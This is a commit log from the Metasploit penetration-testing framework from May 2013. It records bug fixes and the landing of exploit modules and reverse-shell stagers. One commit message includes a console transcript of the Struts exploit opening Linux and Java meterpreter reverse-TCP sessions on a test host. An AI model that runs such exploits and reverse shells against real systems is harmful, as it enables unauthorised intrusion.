38e5c2bed2
Land #1877 , @zeroSteiner's exploit for Lianja SQL
2013-05-30 14:23:45 -05:00
67128a3841
Land #1821 , x64_reverse_https stagers
2013-05-30 13:55:13 -05:00
cc60c95243
Rescue Errno::ENONENT when using File.mtime for memory cache
...
[#47720609 ]
2013-05-30 13:16:43 -05:00
e0e348a17e
Specs to ensure File.mtime error is caught.
...
[#47720609 ]
2013-05-30 13:09:40 -05:00
541d287e70
Merge branch 'master' into bug/module-load-cache-update
2013-05-30 12:59:50 -05:00
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
8b488c3c6b
Merge pull request #1866 from dmaloney-r7/bug/mdm_session_port
...
Add session_port to the mdm object
SEERM #7281
2013-05-30 10:05:48 -07:00
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
70e1379338
Use msvcrt in ropdb for stability.
2013-05-30 11:13:22 -04:00
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
00debd01c6
Listen for a connection and spawn a command shell via AWK
2013-05-29 21:22:49 -03:00
d4a864c29f
Creates an interactive shell via AWK (reverse)
2013-05-29 21:19:08 -03:00
07203568bd
Performed changes to the correct operation of the module.
2013-05-29 20:50:28 -03:00
07c99f821e
Land #1879 , @dcbz ARM stagers
2013-05-29 17:43:37 -05:00
fff51e2e0c
Land #1882 , fix for CVE search from @jlee-r7
2013-05-29 17:00:32 -05:00
12f0448bb4
Use a LIKE test instead of equality
...
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match
[SeeRM #7989 ]
2013-05-29 16:27:33 -05:00
f76a50ae38
Land #1881 , @todb's fix for Redmine Bug 7991
2013-05-29 16:17:18 -05:00
e7a1f06fbc
Modules shouldn't be +x
2013-05-29 15:11:35 -05:00
8b8fb9f5ae
Merge pull request #1 from jvazquez-r7/arm_stagers
...
ARM stagers cleanup
2013-05-29 13:07:46 -07:00
7c41e239b4
Fix author name
2013-05-29 14:19:10 -05:00
e6433fc31e
Add commented source code for stagers and stage
2013-05-29 14:03:46 -05:00
52aae8e04c
Add small fixes for stagers
2013-05-29 14:01:59 -05:00
10d8bebe73
Start with a random username to test 401 codes
...
SeeRM #7991
While this fixes the specific case of tomcat_mgr_login, it doesn't
address the general case where modules are attempting to test code 401
responses in order to determine if bruteforcing should continue.
2013-05-29 12:36:28 -05:00
f0e3b0c124
Merge pull request #1836 from dmaloney-r7/bug/anyuser_anypass_http
...
Verified MSF specs passing, Pro on develop functional tests working (ran Bruteforce, saw normal and verbose output concerning that bruteforce was skipped for such a case and why, verified no cred saved with 'anyuser' user).
2013-05-29 07:44:18 -07:00
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
c3ab1ed2a5
Exploit module for Lianja SQL 1.0.0RC5.1
2013-05-29 08:48:41 -04:00
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
2c0f0f5f04
Changed reverse payload as suggested.
2013-05-28 21:52:16 -05:00
07c3565e3c
Made changes as suggested, forgot to remove exit() after testing was complete.
2013-05-28 21:31:36 -05:00
146284cdd5
Land #1876 , @wchen-r7's fix for Redmine 7984
2013-05-28 20:05:50 -05:00
ed5b8895bb
Fixes smart_migrate for a TypeError bug
...
Bug is: TypeError can't convert Rex::RuntimeError into String
[SeeRM: #7984 ]
2013-05-28 18:45:49 -05:00
63694a6c87
Landing #1875 - Also remove *.ts.rb files
2013-05-28 17:29:02 -05:00
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
14c4dbcf8c
Also remove *.ts.rb files
...
On the heels of #1862 , this gets rid of the "test suites" that bound
together all the old unit tests.
2013-05-28 17:05:44 -05:00
a486fff9a4
Land #1872 , @wchen-r7's improvement of cold_fusion_version
2013-05-28 16:35:45 -05:00
96888455a7
Add new signature for CF9
2013-05-28 16:04:08 -05:00
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
0466cce7b1
Move PostMixin to its own file
...
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
2013-05-28 15:46:06 -05:00
8cb1bdefb7
Landing #1849 - 32 and 64bit compatible to_winpe_only() function
2013-05-28 15:24:43 -05:00
deea66b76f
Landing #1871 - fix an undefined variable bug in the DTP module
2013-05-28 15:13:20 -05:00
085b943107
Landing #1873 - mdm version bump
2013-05-28 15:03:39 -05:00
5b4c26146c
mdm version bump
2013-05-28 14:59:38 -05:00
b9969a8b2b
Landing #1855 - Updates for coldfusion_pwd_props for CF9 by ringt
2013-05-28 14:43:09 -05:00
0ecffea66f
Updates fingerprint() for CF10
2013-05-28 14:42:11 -05:00
jvazquez-r7
Tod Beardsley
Luke Imhoff
Console
lsanchez-r7
Spencer McIntyre
Roberto Soares Espreto
James Lee
dcbz
Samuel Huckins
sinn3r
David Maloney